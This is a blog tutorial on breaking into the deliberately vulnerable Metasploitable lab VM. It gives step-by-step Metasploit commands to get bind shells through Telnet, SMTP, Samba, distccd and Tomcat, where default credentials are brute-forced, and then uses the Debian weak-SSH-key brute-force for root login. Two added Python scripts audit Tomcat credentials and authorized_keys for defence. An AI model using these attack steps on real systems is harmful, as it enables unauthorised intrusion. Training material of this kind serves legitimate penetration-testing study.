Saturday, 7 November 2015

Rooting a Linux box, Metasploit style


Today I’ll be writing a guide on how to exploit Metasploitable with the Metasploit Framework. Who is this tutorial for? Anyone who is interested in beginning a journey as a penetration tester. This tutorial will cover:
  • An overview of how to use the Metasploit Framework: searching for and using modules, and launching exploits.
  • How to scan and exploit running services on a target using the MSF.
  • How to use one public exploit, explained later.
The VM I’m booting is specifically designed to be exploited with Metasploit, but I will also be using one public exploit from http://www.exploit-db.com/ that I have used personally in the past.
Victim’s IP address: 192.168.1.6
Attacker’s IP address: 192.168.1.10
NOTE: BT4-R2 is what I will be using to exploit the VM. BT4 Final does not yield the same results, so keep that in mind. Without further ado, let’s begin…
**0x01 Enumeration**
The most important part of any penetration test is enumeration: the information you gather is the information you will use to plan the attack against your target.
  • First let’s start off with a simple Nmap scan to reveal the open ports and running services of our target.
As pen-testers, we need to understand what these services do, and we also need to familiarize ourselves with the commonly running services for future audits.
Some common services include, but are not limited to:
  • FTP
  • Telnet
  • SSH
  • IMAP
  • POP3
  • MySQL
These services run as daemons and show up on the majority of targets.
Sometimes Nmap scans will not show EVERY open port, so I also ran Nessus against our target to catch what Nmap did not.
NOTE: Operating system identification is essential for the payloads and some of the exploits we will be launching. This VM is NOT Windows, so we need to use *nix payloads instead of Windows payloads if we want to get a session when the exploit succeeds.
To scan the running services on the Metasploitable machine (192.168.1.6), I’ll be doing a SYN stealth scan with version detection to identify the services:
nmap -sS -sV 192.168.1.6
Code:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
**0x02 Exploiting Running Services**
Based on the Nmap scan, we can see that we have a number of running services.

Exploiting Telnet : Port 23
Let’s begin by exploiting Telnet!
  • Telnet provides an unencrypted channel between the client and the server, so logins and session contents cross the network in cleartext. Attackers can take advantage of users using Telnet with ARP cache poisoning.
Now that we have a potentially vulnerable service, let’s go to ./msfconsole and search for the available exploits.
NOTE: Updating the Metasploit Framework will not be necessary for this video; if left un-updated, you will get the same results.
On the MSF console type search telnet
The exploit that we will be using is solaris/telnet/fuser, a Telnet remote authentication bypass. To use that exploit, type:
use solaris/telnet/fuser
Now we need to set the options for this exploit in order for it to work properly. To see the options you need to set, type show options. Then set the specifications for this exploit:
set RHOST 192.168.1.6
set RPORT 23
set USER bin
The default remote port is 23 and the default username to use is bin.
Now that we have everything set for the exploit, we need to choose a payload. The payload I will be using is cmd/unix/bind_perl, but you can pick your own by typing show payloads to see the other payloads available for this exploit. To use that payload we type set payload cmd/unix/bind_perl
Now we need to set the requirements for the payload as well, if it’s not done for you:
show options
set RHOST 192.168.1.6
Now that we have everything set for both the exploit and the payload, our next step is simply to call exploit to launch it. Typing exploit will launch the exploit and, as you can see, it was successful!

Exploiting Postfix SMTPd : Port 25
Let’s continue by exploiting another running service, in this case SMTP.
  • Without going into too much detail, the Postfix SMTP server is used to receive mail from the network. It can be heavily spammed and can also be exposed to junk mail and viruses!
On the MSF console type search smtp.
The exploit that we will be using is unix/smtp/clamav_milter_blackhole, a remote code execution exploit against this SMTP setup. To use that exploit, type:
use unix/smtp/clamav_milter_blackhole
Now, just like before, we need to set the options for this exploit in order for it to work properly. Again, to see the options you need to set, type show options, and continue to set the specifications for this exploit:
set RHOST 192.168.1.6
set RPORT 25
The default remote port is 25; these are the only options we are interested in setting.
Now that we have everything set for the exploit, let’s choose a payload. The payload I will be using is cmd/unix/bind_ruby. Be sure to specify that’s the payload you will be using by typing set payload cmd/unix/bind_ruby. Once again, we need to set the requirements for the payload:
show options
set RHOST 192.168.1.6
Now that everything is set, typing exploit will launch the exploit successfully!

Exploiting Samba SMBd 3.x : Port 139
The next service to be exploited lies on port 139.
  • Understanding network protocols is essential to network penetration testing. Samba is the product name, but what we need to understand is what SMB is: Server Message Block is a protocol used for sharing files and printers between computers.
Let’s search for Samba exploits by typing search samba.
The exploit that we will be using is multi/samba/usermap_script, a command execution exploit. To use that exploit, type:
use multi/samba/usermap_script
Let’s continue by setting the exploit’s requirements that we are interested in:
set RHOST 192.168.1.6
set RPORT 139
The default remote port is 139. Now let’s choose our desired payload. The payload I’ll be using is cmd/unix/bind_ruby. Let’s set the payload, set the options for the payload, and launch the exploit:
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploit
Exploit successful.

Exploiting distccd : Port 3632
Remember the Nessus scan we did prior to exploitation? This is where we got this running service that Nmap did not pick up.
  • Simply put, distcc is a program designed to distribute compiling tasks across a network to participating hosts.
The Nessus scan describes it as…
  • Distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. Distcc should always generate the same results as a local build, is simple to install and use, and is often two or more times faster than a local compile. Distcc by default trusts its clients completely, which in turn could allow a malicious client to execute arbitrary commands on the server.
Let’s search for anything related to this service by typing search distccd
The exploit I’ll be using for this service is unix/misc/distcc_exec, a daemon command execution exploit. Now let’s repeat the previous steps all in one, including choosing the payload, to save time:
use unix/misc/distcc_exec
show options
set RHOST 192.168.1.6
set RPORT 3632
set payload cmd/unix/bind_ruby
show options
set RHOST 192.168.1.6
exploit
By default, the port is 3632. As you can see, the exploit succeeded.

Exploiting Apache Tomcat/Coyote JSP Engine 1.1
I left Apache Tomcat for last because I had to use an auxiliary module to get the username and password, and then an exploit to break into the VM.
First let’s start with the auxiliary module by typing search tomcat
The auxiliary module I’ll be using is scanner/http/tomcat_mgr_login, which brute-forces the Tomcat Application Manager login. To use it we type use scanner/http/tomcat_mgr_login. Now the only option we need to set is the remote host, and then we launch it:
set RHOSTS 192.168.1.6
exploit
If you scroll up to the green lines you can see that the credentials found are tomcat:tomcat, which are the defaults.
Now how can we use this to our advantage? We can either go to the daemon and log into the manager, or exploit it further and get a shell.
Once again we type search tomcat and find the exploit multi/http/tomcat_mgr_deploy, Tomcat’s Application Manager Deployer upload-and-execute exploit. Sounds good enough to test! Now let’s use that exploit, set the specifications, choose a payload, set the requirements and launch the exploit:
use multi/http/tomcat_mgr_deploy
show options
set RHOST 192.168.1.6
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set payload generic/shell_bind_tcp
show options
set RHOST 192.168.1.6
exploit
As expected, we have a shell against the target.
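The flip side of this step, as an added example that is not part of the original post: the manager login the scanner found is configured in Tomcat’s tomcat-users.xml, so hardening the box means auditing that file for default passwords on accounts that hold deployment roles. The sample XML, the default-password list and the privileged-role set below are constructed assumptions, not taken from the VM; only the Python standard library is used.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml, modelled on a stock install where the manager
# account still uses the default credential pair the scanner found above.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="ops" password="Xq7!v9Lp2#rT" roles="manager"/>
</tomcat-users>
"""

# Hypothetical list of vendor-default or example passwords worth flagging.
DEFAULT_PASSWORDS = {"tomcat", "s3cret", "admin", "password", ""}
# Roles that allow deploying applications (names vary by Tomcat version; assumed set).
PRIVILEGED_ROLES = {"manager", "manager-gui", "manager-script", "admin", "admin-gui"}

def audit_tomcat_users(xml_text):
    """Return [(username, [problem, ...])] for every account with a weak password.

    A weak password on an account that also holds a deployment role gets an extra
    problem line, since that combination is what turns a login into code execution."""
    root = ET.fromstring(xml_text)
    findings = []
    for user in root.iter("user"):
        name = user.get("username", "")
        password = user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",") if r.strip()}
        problems = []
        if password == name:
            problems.append("password equals username")
        if password in DEFAULT_PASSWORDS:
            problems.append("default/example password")
        privileged = roles & PRIVILEGED_ROLES
        if problems and privileged:
            problems.append("holds privileged role(s): " + ", ".join(sorted(privileged)))
        if problems:
            findings.append((name, problems))
    return findings

if __name__ == "__main__":
    for name, problems in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{name}: " + "; ".join(problems))
```

On the sample file the tomcat account is reported with all three problems, the low-privilege “both” account only for its default password, and the “ops” account not at all.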

Launching a Public Exploit
Now let’s do some snooping around. Based on the Nmap scan, we know that the target runs SSH, so what we are interested in looking for is the authorized keys. By default they are placed in the user’s home directory, in this case root’s.
Here is more information about SSH authorized keys:
  • AuthorizedKeysFile specifies the file containing the public keys used for public key authentication. It lists the public keys (RSA/DSA) that can be used for logging in as this user.
Let’s go ahead and read this file by catting out its contents:
cat /root/.ssh/authorized_keys
As you can see, there it is. The exploit we are going to launch is located here:
http://www.exploit-db.com/exploits/5622/
However, we are not going to be using the code. This system has weak SSH keys: as described on the exploit’s page, there are only a limited number of possible keys, so we can brute-force them.
Now in a new terminal, type tar jxvf (followed by the archive name) to extract the keys to /root/, then type cd /rsa/2048
Back in the shell we have in MSF, let’s grab the entire key, which will be:
AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
We need to find this among the keys we extracted. In the terminal we type:
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
-l prints only the names of matching files and -r searches recursively, so this finds the public RSA key whose private half we will use to authenticate as root. This is the result you get:
57c3115d77c56390332dc5c49978627a-5429.pub
That string of letters and numbers is the name of the identity file for SSH. Now we simply type:
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.6
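The defender’s version of this last step, as an added example that is not part of the original post: an administrator auditing /root/.ssh/authorized_keys parses each entry, computes its fingerprint and checks it against a list of known-weak keys, which is what Debian’s ssh-vulnkey did for the predictable-PRNG keys this exploit relies on, and additionally flags RSA keys with a short modulus. Everything below is constructed: the sample file, the “moduli” (hash-derived filler with the right bit length, not real RSA moduli) and the blacklist, which stands in for the published weak-key lists. Python standard library only.

```python
import base64
import hashlib
import struct

def _ssh_string(data):
    return struct.pack(">I", len(data)) + data

def _mpint(n):
    # SSH mpint: big-endian, with a leading 0x00 if the high bit would otherwise be set
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if b[0] & 0x80:
        b = b"\x00" + b
    return _ssh_string(b)

def build_rsa_blob(e, n):
    """Encode an ssh-rsa public key blob (used here only to build sample data)."""
    return _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)

def parse_rsa_blob(blob):
    """Return (e, n) from an ssh-rsa blob; raise ValueError on malformed input."""
    fields, off = [], 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length field")
        (length,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + length > len(blob):
            raise ValueError("field runs past end of blob")
        fields.append(blob[off:off + length])
        off += length
    if len(fields) != 3 or fields[0] != b"ssh-rsa":
        raise ValueError("not an ssh-rsa key")
    return int.from_bytes(fields[1], "big"), int.from_bytes(fields[2], "big")

def fingerprint(blob):
    """OpenSSH-style fingerprint: 'SHA256:' plus unpadded base64 of SHA-256(blob)."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519")

def parse_authorized_keys(text):
    """Return (keytype, blob, comment) per key line; comments, blanks and junk are skipped.
    An options prefix such as from="..." is tolerated by locating the key-type token."""
    entries = []
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        idx = next((i for i, t in enumerate(parts)
                    if t in KEY_TYPES or t.startswith("ecdsa-sha2-")), None)
        if idx is None or idx + 1 >= len(parts):
            continue  # no key type or no key material on this line
        try:
            blob = base64.b64decode(parts[idx + 1], validate=True)
        except ValueError:
            continue  # key material is not valid base64
        entries.append((parts[idx], blob, " ".join(parts[idx + 2:])))
    return entries

def audit_authorized_keys(text, blacklist, min_rsa_bits=2048):
    """Flag keys whose fingerprint is blacklisted or whose RSA modulus is too short."""
    findings = []
    for keytype, blob, comment in parse_authorized_keys(text):
        fp, reasons = fingerprint(blob), []
        if fp in blacklist:
            reasons.append("fingerprint on known-weak key blacklist")
        if keytype == "ssh-rsa":
            try:
                _, n = parse_rsa_blob(blob)
                if n.bit_length() < min_rsa_bits:
                    reasons.append(f"RSA modulus only {n.bit_length()} bits")
            except ValueError as exc:
                reasons.append(f"malformed key blob: {exc}")
        if reasons:
            findings.append((fp, comment, reasons))
    return findings

# Constructed sample data: hash-derived filler "moduli" of the right size, not real RSA
# moduli, and a one-entry blacklist standing in for the published weak-key lists.
WEAK_N = int.from_bytes(hashlib.sha256(b"constructed weak key").digest() * 4, "big") | (1 << 1023) | 1
GOOD_N = int.from_bytes(hashlib.sha256(b"constructed good key").digest() * 8, "big") | (1 << 2047) | 1
WEAK_BLOB = build_rsa_blob(65537, WEAK_N)
GOOD_BLOB = build_rsa_blob(65537, GOOD_N)
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample /root/.ssh/authorized_keys",
    "ssh-rsa " + base64.b64encode(WEAK_BLOB).decode() + " root@metasploitable",
    'from="192.168.1.0/24" ssh-rsa ' + base64.b64encode(GOOD_BLOB).decode() + " admin@laptop",
    "ssh-rsa not-base64!! broken@host",
])
KNOWN_WEAK = {fingerprint(WEAK_BLOB)}

if __name__ == "__main__":
    for fp, comment, reasons in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_WEAK):
        print(fp, comment, "; ".join(reasons))
```

Fingerprinting the blob rather than comparing the base64 text is what makes the check robust to reformatting, and it matches what `ssh-keygen -lf` prints, so findings can be cross-checked by hand.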
